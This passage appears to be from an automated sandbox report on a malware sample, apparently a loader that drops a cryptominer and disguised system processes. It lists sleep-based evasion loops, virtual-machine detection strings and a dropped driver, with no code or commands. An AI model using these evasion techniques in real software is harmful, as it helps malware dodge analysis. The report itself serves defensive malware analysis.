Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599854
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599716
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599534
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599285
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599127
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598988
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598850
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598734
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599803
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599687
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599552
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599436
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599327
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599108
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 632	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 367	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 570	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6915
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1925
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7248
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2363
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8090
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8107
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8396
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Window / User API: threadDelayed 1418
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8604
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 492
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Window / User API: threadDelayed 579
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Window / User API: threadDelayed 1064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9208
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6049
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3564
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7996
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1373
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6750
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2914

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe

Dropped PE file which has not been started: C:\Windows\System32\Microsoft\Libs\WR64.sys

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3132	Thread sleep time: -54027s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6036	Thread sleep count: 632 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6036	Thread sleep time: -1264632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3568	Thread sleep count: 367 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3568	Thread sleep time: -11010000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4852	Thread sleep time: -1080000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3180	Thread sleep count: 641 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3180	Thread sleep time: -1282641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1544	Thread sleep count: 570 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1544	Thread sleep time: -1140570s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 5944	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 7212	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 7212	Thread sleep time: -1020000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe TID: 7696	Thread sleep time: -570000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe TID: 7532	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe TID: 1436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep count: 2894 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep count: 6915 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916	Thread sleep count: 7641 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4600	Thread sleep count: 1925 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 2740	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 8008 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5012	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396	Thread sleep count: 1292 > 30
Source: C:\Windows\System32\services64.exe TID: 5960	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1236	Thread sleep count: 7248 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896	Thread sleep count: 2363 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\services64.exe TID: 888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304	Thread sleep count: 8090 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996	Thread sleep count: 8107 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2784	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020	Thread sleep count: 8396 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260	Thread sleep count: 133 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6192	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6412	Thread sleep count: 1418 > 30
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -599854s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -599716s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -599534s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -599285s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -599127s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -598988s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -598850s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -598734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -598625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -598515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6904	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6748	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 6868	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 3748	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568	Thread sleep count: 8604 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5320	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568	Thread sleep count: 492 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6452	Thread sleep count: 579 > 30
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599803s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6452	Thread sleep count: 1064 > 30
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599552s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599436s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599327s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120	Thread sleep time: -599108s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 2812	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 7820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 7896	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 1984	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412	Thread sleep count: 9208 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124	Thread sleep count: 6049 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124	Thread sleep count: 3564 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6712	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008	Thread sleep count: 7996 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200	Thread sleep count: 1373 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4364	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240	Thread sleep count: 6750 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240	Thread sleep count: 2914 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 396	Thread sleep time: -6456360425798339s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

7_2_00402218

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\services64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\services64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599854
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599716
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599534
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599285
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599127
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598988
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598850
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598734
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599803
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599687
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599552
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599436
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599327
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599108
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: axplong.exe, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: svchost64.exe, 00000095.00000002.2843997051.0000000000598000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914[1].exe.6.dr, Microsoft-Edge.exe.7.dr, loader_5879465914.exe.6.dr	Binary or memory string: IsVirtualMachine
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2766846263.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2950307615.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2577066128.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2843755674.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2436766433.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2673880736.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2358096287.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2400016250.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914[1].exe.6.dr, Microsoft-Edge.exe.7.dr, loader_5879465914.exe.6.dr	Binary or memory string: CheckForVirtualMachine
Source: file.exe, 00000000.00000002.1763073628.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1789659705.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1789484442.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
